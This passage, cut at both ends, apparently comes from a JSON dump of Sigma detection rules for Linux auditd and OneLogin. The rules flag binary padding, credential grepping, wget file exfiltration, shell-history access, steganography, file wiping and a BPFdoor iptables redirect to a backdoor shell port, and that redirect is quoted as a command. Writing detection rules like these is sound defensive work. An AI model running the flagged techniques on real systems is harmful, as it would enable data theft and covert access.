    "content": "title: OneLogin User Account Locked\nid: a717c561-d117-437e-b2d9-0118a7035d01\nstatus: test\ndescription: Detects when an user account is locked or suspended.\nreferences:\n    - https://developers.onelogin.com/api-docs/1/events/event-resource/\nauthor: Austin Songer @austinsonger\ndate: 2021-10-12\nmodified: 2022-12-25\ntags:\n    - attack.impact\nlogsource:\n    product: onelogin\n    service: onelogin.events\ndetection:\n    selection1: # Locked via API\n        event_type_id: 532\n    selection2: # Locked via API\n        event_type_id: 553\n    selection3: # Suspended via API\n        event_type_id: 551\n    condition: 1 of selection*\nfalsepositives:\n    - System may lock or suspend user accounts.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_binary_padding.yml",
    "content": "title: Binary Padding - Linux\nid: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba\nstatus: test\ndescription: |\n    Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\n    This rule detect using dd and truncate to add a junk data to file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md\nauthor: Igor Fits, oscd.community\ndate: 2020-10-13\nmodified: 2023-05-03\ntags:\n    - attack.defense-evasion\n    - attack.t1027.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_execve:\n        type: 'EXECVE'\n    keywords_truncate:\n        '|all':\n            - 'truncate'\n            - '-s'\n    keywords_dd:\n        '|all':\n            - 'dd'\n            - 'if='\n    keywords_filter:\n        - 'of='\n    condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter))\nfalsepositives:\n    - Unknown\nlevel: high\nsimulation:\n    - type: atomic-red-team\n      name: Pad Binary to Change Hash - Linux/macOS dd\n      technique: T1027.001\n      atomic_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_bpfdoor_port_redirect.yml",
    "content": "title: Bpfdoor TCP Ports Redirect\nid: 70b4156e-50fc-4523-aa50-c9dddf1993fc\nstatus: test\ndescription: |\n    All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\n    The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\nreferences:\n    - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n    - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\nauthor: Rafal Piasecki\ndate: 2022-08-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    cmd:\n        type: 'EXECVE'\n        a0|endswith: 'iptables'\n        a1: '-t'\n        a2: 'nat'\n    keywords:\n        - '--to-ports 42'\n        - '--to-ports 43'\n    condition: cmd and keywords\nfalsepositives:\n    - Legitimate ports redirect\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_capabilities_discovery.yml",
    "content": "title: Linux Capabilities Discovery\nid: fe10751f-1995-40a5-aaa2-c97ccb4123fe\nstatus: test\ndescription: Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.\nreferences:\n    - https://man7.org/linux/man-pages/man8/getcap.8.html\n    - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/\n    - https://mn3m.info/posts/suid-vs-capabilities/\n    - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099\nauthor: 'Pawel Mazur'\ndate: 2021-11-28\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1083\n    - attack.t1548\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: getcap\n        a1: '-r'\n        a2: '/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_change_file_time_attr.yml",
    "content": "title: File Time Attribute Change - Linux\nid: b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b\nstatus: test\ndescription: Detect file time attribute change to hide new or changes to existing files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md\nauthor: 'Igor Fits, oscd.community'\ndate: 2020-10-15\nmodified: 2022-11-28\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    execve:\n        type: 'EXECVE'\n    touch:\n        - 'touch'\n    selection2:\n        - '-t'\n        - '-acmr'\n        - '-d'\n        - '-r'\n    condition: execve and touch and selection2\nfalsepositives:\n    - Unknown\nlevel: medium\nsimulation:\n    - type: atomic-red-team\n      name: Set a file's access timestamp\n      technique: T1070.006\n      atomic_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810\n    - type: atomic-red-team\n      name: Set a file's modification timestamp\n      technique: T1070.006\n      atomic_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52\n    - type: atomic-red-team\n      name: Modify file timestamps using reference file\n      technique: T1070.006\n      atomic_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_chattr_immutable_removal.yml",
    "content": "title: Remove Immutable File Attribute - Auditd\nid: a5b977d6-8a81-4475-91b9-49dbfcd941f7\nstatus: test\ndescription: Detects removing immutable file attribute.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md\nauthor: Jakob Weinzettl, oscd.community\ndate: 2019-09-23\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.t1222.002\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0|contains: 'chattr'\n        a1|contains: '-i'\n    condition: selection\nfalsepositives:\n    - Administrator interacting with immutable files (e.g. for instance backups).\nlevel: medium\nsimulation:\n    - type: atomic-red-team\n      name: Remove immutable file attribute\n      technique: T1222.002\n      atomic_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_clipboard_collection.yml",
    "content": "title: Clipboard Collection with Xclip Tool - Auditd\nid: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf\nstatus: test\ndescription: |\n  Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\n  Xclip has to be installed.\n  Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\nreferences:\n    - https://linux.die.net/man/1/xclip\n    - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/\nauthor: 'Pawel Mazur'\ndate: 2021-09-24\nmodified: 2022-11-26\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: xclip\n        a1:\n            - '-selection'\n            - '-sel'\n        a2:\n            - clipboard\n            - clip\n        a3: '-o'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of xclip tools\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_clipboard_image_collection.yml",
    "content": "title: Clipboard Collection of Image Data with Xclip Tool\nid: f200dc3f-b219-425d-a17e-c38467364816\nstatus: test\ndescription: |\n  Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\n  Xclip has to be installed.\n  Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\nreferences:\n    - https://linux.die.net/man/1/xclip\nauthor: 'Pawel Mazur'\ndate: 2021-10-01\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: xclip\n        a1:\n            - '-selection'\n            - '-sel'\n        a2:\n            - clipboard\n            - clip\n        a3: '-t'\n        a4|startswith: 'image/'\n        a5: '-o'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of xclip tools\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_coinminer.yml",
    "content": "title: Possible Coin Miner CPU Priority Param\nid: 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed\nstatus: test\ndescription: Detects command line parameter very often used with coin miners\nreferences:\n    - https://xmrig.com/docs/miner/command-line-options\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-09\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    cmd1:\n        a1|startswith: '--cpu-priority'\n    cmd2:\n        a2|startswith: '--cpu-priority'\n    cmd3:\n        a3|startswith: '--cpu-priority'\n    cmd4:\n        a4|startswith: '--cpu-priority'\n    cmd5:\n        a5|startswith: '--cpu-priority'\n    cmd6:\n        a6|startswith: '--cpu-priority'\n    cmd7:\n        a7|startswith: '--cpu-priority'\n    condition: 1 of cmd*\nfalsepositives:\n    - Other tools that use a --cpu-priority flag\nlevel: critical\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_data_compressed.yml",
    "content": "title: Data Compressed\nid: a3b5e3e9-1b49-4119-8b8e-0344a01f21ee\nstatus: test\ndescription: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-07-28\ntags:\n    - attack.exfiltration\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection1:\n        type: 'execve'\n        a0: 'zip'\n    selection2:\n        type: 'execve'\n        a0: 'gzip'\n        a1: '-k'\n    selection3:\n        type: 'execve'\n        a0: 'tar'\n        a1|contains: '-c'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate use of archiving tools by legitimate user.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_data_exfil_wget.yml",
    "content": "title: Data Exfiltration with Wget\nid: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc\nstatus: test\ndescription: |\n    Detects attempts to post the file with the usage of wget utility.\n    The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\nreferences:\n    - https://linux.die.net/man/1/wget\n    - https://gtfobins.github.io/gtfobins/wget/\nauthor: 'Pawel Mazur'\ndate: 2021-11-18\nmodified: 2022-12-25\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: wget\n        a1|startswith: '--post-file='\n    condition: selection\nfalsepositives:\n    - Legitimate usage of wget utility to post a file\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_dd_delete_file.yml",
    "content": "title: Overwriting the File with Dev Zero or Null\nid: 37222991-11e9-4b6d-8bdf-60fbe48f753e\nstatus: stable\ndescription: Detects overwriting (effectively wiping/deleting) of a file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md\nauthor: Jakob Weinzettl, oscd.community\ndate: 2019-10-23\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0|contains: 'dd'\n        a1|contains:\n            - 'if=/dev/null'\n            - 'if=/dev/zero'\n    condition: selection\nfalsepositives:\n    - Appending null bytes to files.\n    - Legitimate overwrite of files.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_file_or_folder_permissions.yml",
    "content": "title: File or Folder Permissions Change\nid: 74c01ace-0152-4094-8ae2-6fd776dd43e5\nstatus: test\ndescription: Detects file and folder permission changes.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md\nauthor: Jakob Weinzettl, oscd.community\ndate: 2019-09-23\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1222.002\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0|contains:\n            - 'chmod'\n            - 'chown'\n    condition: selection\nfalsepositives:\n    - User interacting with files permissions (normal/daily behaviour).\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_find_cred_in_files.yml",
    "content": "title: Credentials In Files - Linux\nid: df3fcaea-2715-4214-99c5-0056ea59eb35\nstatus: test\ndescription: 'Detecting attempts to extract passwords with grep'\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: 'Igor Fits, oscd.community'\ndate: 2020-10-15\nmodified: 2023-04-30\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n    keywords:\n        '|all':\n            - 'grep'\n            - 'password'\n    condition: selection and keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_hidden_files_directories.yml",
    "content": "title: Hidden Files and Directories\nid: d08722cd-3d09-449a-80b4-83ea2d9d4616\nstatus: test\ndescription: Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md\nauthor: 'Pawel Mazur'\ndate: 2021-09-06\nmodified: 2025-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_commands:\n        type: 'EXECVE'\n        a0:\n            - 'mkdir'\n            - 'nano'\n            - 'touch'\n            - 'vi'\n            - 'vim'\n    selection_arguments:\n        - a1|re: '(^|\\/)\\.[^.\\/]'\n        - a2|re: '(^|\\/)\\.[^.\\/]'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_hidden_zip_files_steganography.yml",
    "content": "title: Steganography Hide Zip Information in Picture File\nid: 45810b50-7edc-42ca-813b-bdac02fb946b\nstatus: test\ndescription: Detects appending of zip file to image\nreferences:\n    - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/\nauthor: 'Pawel Mazur'\ndate: 2021-09-09\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    commands:\n        type: EXECVE\n        a0: cat\n    a1:\n        a1|endswith:\n            - '.jpg'\n            - '.png'\n    a2:\n        a2|endswith: '.zip'\n    condition: commands and a1 and a2\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_masquerading_crond.yml",
    "content": "title: Masquerading as Linux Crond Process\nid: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0\nstatus: test\ndescription: |\n  Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\n  Several different variations of this technique have been observed.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-08-22\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'execve'\n        a0: 'cp'\n        a1: '/bin/sh'\n        a2|endswith: '/crond'\n    condition: selection\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_modify_system_firewall.yml",
    "content": "title: Modify System Firewall\nid: 323ff3f5-0013-4847-bbd4-250b5edb62cc\nrelated:\n    - id: 53059bc0-1472-438b-956a-7508a94a91f0\n      type: similar\nstatus: test\ndescription: |\n    Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\n    Detection rules that match only on the disabling of firewalls will miss this.\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html\n    - https://blog.aquasec.com/container-security-tnt-container-attack\n    - https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/getting-started-with-nftables_configuring-and-managing-networking\nauthor: IAI\ndate: 2023-03-06\nmodified: 2025-10-12\ntags:\n    - attack.t1562.004\n    - attack.defense-evasion\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection1:\n        type: 'EXECVE'\n        a0: 'iptables'\n        a1|contains: 'DROP'\n    selection2:\n        type: 'EXECVE'\n        a0: 'firewall-cmd'\n        a1|contains: 'remove'\n    selection3:\n        type: 'EXECVE'\n        a0: 'ufw'\n        a1|contains: 'delete'\n    selection4:\n        type: 'EXECVE'\n        a0: 'nft'\n        a1|contains:\n            - 'delete'\n            - 'flush'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate admin activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_network_sniffing.yml",
    "content": "title: Network Sniffing - Linux\nid: f4d3748a-65d1-4806-bd23-e25728081d01\nstatus: test\ndescription: |\n  Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\n  An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2022-12-18\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1040\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_1:\n        type: 'execve'\n        a0: 'tcpdump'\n        a1: '-c'\n        a3|contains: '-i'\n    selection_2:\n        type: 'execve'\n        a0: 'tshark'\n        a1: '-c'\n        a3: '-i'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administrator or user uses network sniffing tool for legitimate reasons.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_screencapture_import.yml",
    "content": "title: Screen Capture with Import Tool\nid: dbe4b9c5-c254-4258-9688-d6af0b7967fd\nstatus: test\ndescription: |\n  Detects adversary creating screen capture of a desktop with Import Tool.\n  Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\n  ImageMagick must be installed.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md\n    - https://linux.die.net/man/1/import\n    - https://imagemagick.org/\nauthor: 'Pawel Mazur'\ndate: 2021-09-21\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    import:\n        type: EXECVE\n        a0: import\n    import_window_root:\n        a1: '-window'\n        a2: 'root'\n        a3|endswith:\n            - '.png'\n            - '.jpg'\n            - '.jpeg'\n    import_no_window_root:\n        a1|endswith:\n            - '.png'\n            - '.jpg'\n            - '.jpeg'\n    condition: import and (import_window_root or import_no_window_root)\nfalsepositives:\n    - Legitimate use of screenshot utility\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_screencaputre_xwd.yml",
    "content": "title: Screen Capture with Xwd\nid: e2f17c5d-b02a-442b-9052-6eb89c9fec9c\nstatus: test\ndescription: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture\n    - https://linux.die.net/man/1/xwd\nauthor: 'Pawel Mazur'\ndate: 2021-09-13\nmodified: 2022-12-18\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: xwd\n    xwd_root_window:\n        a1: '-root'\n        a2: '-out'\n        a3|endswith: '.xwd'\n    xwd_no_root_window:\n        a1: '-out'\n        a2|endswith: '.xwd'\n    condition: selection and 1 of xwd_*\nfalsepositives:\n    - Legitimate use of screenshot utility\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_steghide_embed_steganography.yml",
    "content": "title: Steganography Hide Files with Steghide\nid: ce446a9e-30b9-4483-8e38-d2c9ad0a2280\nstatus: test\ndescription: Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.\nreferences:\n    - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/\nauthor: 'Pawel Mazur'\ndate: 2021-09-11\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: steghide\n        a1: embed\n        a2:\n            - '-cf'\n            - '-ef'\n        a4:\n            - '-cf'\n            - '-ef'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_steghide_extract_steganography.yml",
    "content": "title: Steganography Extract Files with Steghide\nid: a5a827d9-1bbe-4952-9293-c59d897eb41b\nstatus: test\ndescription: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.\nreferences:\n    - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/\nauthor: 'Pawel Mazur'\ndate: 2021-09-11\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: EXECVE\n        a0: steghide\n        a1: extract\n        a2: '-sf'\n        a3|endswith:\n            - '.jpg'\n            - '.png'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_susp_cmds.yml",
    "content": "title: Suspicious Commands Linux\nid: 1543ae20-cbdf-4ec1-8d12-7664d667a825\nstatus: test\ndescription: Detects relevant commands often related to malware or hacking activity\nreferences:\n    - Internal Research - mostly derived from exploit code including code in MSF\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-12-12\nmodified: 2022-10-05\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    cmd1:\n        type: 'EXECVE'\n        a0: 'chmod'\n        a1: 777\n    cmd2:\n        type: 'EXECVE'\n        a0: 'chmod'\n        a1: 'u+s'\n    cmd3:\n        type: 'EXECVE'\n        a0: 'cp'\n        a1: '/bin/ksh'\n    cmd4:\n        type: 'EXECVE'\n        a0: 'cp'\n        a1: '/bin/sh'\n    condition: 1 of cmd*\nfalsepositives:\n    - Admin activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_susp_histfile_operations.yml",
    "content": "title: Suspicious History File Operations - Linux\nid: eae8ce9f-bde9-47a6-8e79-f20d18419910\nstatus: test\ndescription: 'Detects commandline operations on shell history files'\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nauthor: 'Mikhail Larin, oscd.community'\ndate: 2020-10-17\nmodified: 2022-11-28\ntags:\n    - attack.credential-access\n    - attack.t1552.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    execve:\n        type: EXECVE\n    history:\n        - '.bash_history'\n        - '.zsh_history'\n        - '.zhistory'\n        - '.history'\n        - '.sh_history'\n        - 'fish_history'\n    condition: execve and history\nfalsepositives:\n    - Legitimate administrative activity\n    - Legitimate software, cleaning hist file\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_susp_service_reload_or_restart.yml",
    "content": "title: Service Reload or Start - Linux\nid: 2625cc59-0634-40d0-821e-cb67382a3dd7\nstatus: test\ndescription: Detects the start, reload or restart of a service.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md\nauthor: Jakob Weinzettl, oscd.community, CheraghiMilad\ndate: 2019-09-23\nmodified: 2025-03-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.002\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0|contains:\n            - 'systemctl'\n            - 'service'\n        a1|contains:\n            - 'reload'\n            - 'start'\n    condition: selection\nfalsepositives:\n    - Installation of legitimate service.\n    - Legitimate reconfiguration of service.\n    - Command line contains daemon-reload.\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_system_shutdown_reboot.yml",
    "content": "title: System Shutdown/Reboot - Linux\nid: 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f\nstatus: test\ndescription: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md\nauthor: 'Igor Fits, oscd.community'\ndate: 2020-10-15\nmodified: 2022-11-26\ntags:\n    - attack.impact\n    - attack.t1529\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    execve:\n        type: 'EXECVE'\n    shutdowncmd:\n        - 'shutdown'\n        - 'reboot'\n        - 'halt'\n        - 'poweroff'\n    init:\n        - 'init'\n        - 'telinit'\n    initselection:\n        - 0\n        - 6\n    condition: execve and (shutdowncmd or (init and initselection))\nfalsepositives:\n    - Legitimate administrative activity\nlevel: informational\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_unzip_hidden_zip_files_steganography.yml",
    "content": "title: Steganography Unzip Hidden Information From Picture File\nid: edd595d7-7895-4fa7-acb3-85a18a8772ca\nstatus: test\ndescription: Detects extracting of zip file from image file\nreferences:\n    - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/\nauthor: 'Pawel Mazur'\ndate: 2021-09-09\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    commands:\n        type: EXECVE\n        a0: unzip\n    a1:\n        a1|endswith:\n            - '.jpg'\n            - '.png'\n    condition: commands and a1\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/execve/lnx_auditd_user_discovery.yml",
    "content": "title: System Owner or User Discovery - Linux\nid: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3\nstatus: test\ndescription: |\n    Detects the execution of host or user discovery utilities such as \"whoami\", \"hostname\", \"id\", etc.\n    Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2025-06-04\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'EXECVE'\n        a0:\n            - 'hostname'\n            - 'id'\n            - 'last'\n            - 'uname'\n            - 'users'\n            - 'w'\n            - 'who'\n            - 'whoami'\n    condition: selection\nfalsepositives:\n    - Admin activity\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_audio_capture.yml",
    "content": "title: Audio Capture\nid: a7af2487-9c2f-42e4-9bb9-ff961f0561d5\nstatus: test\ndescription: Detects attempts to record audio using the arecord and ecasound utilities.\nreferences:\n    - https://linux.die.net/man/1/arecord\n    - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa\n    - https://manpages.debian.org/unstable/ecasound/ecasound.1.en.html\n    - https://ecasound.seul.org/ecasound/Documentation/examples.html#fconversions\nauthor: Pawel Mazur, Milad Cheraghi\ndate: 2021-09-04\nmodified: 2025-12-05\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_execve:\n        type: EXECVE\n        a0: arecord\n        a1: '-vv'\n        a2: '-fdat'\n    selection_syscall_memfd_create:\n        type: SYSCALL\n        exe|endswith: \"/ecasound\"\n        SYSCALL: 'memfd_create'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_disable_aslr_protection.yml",
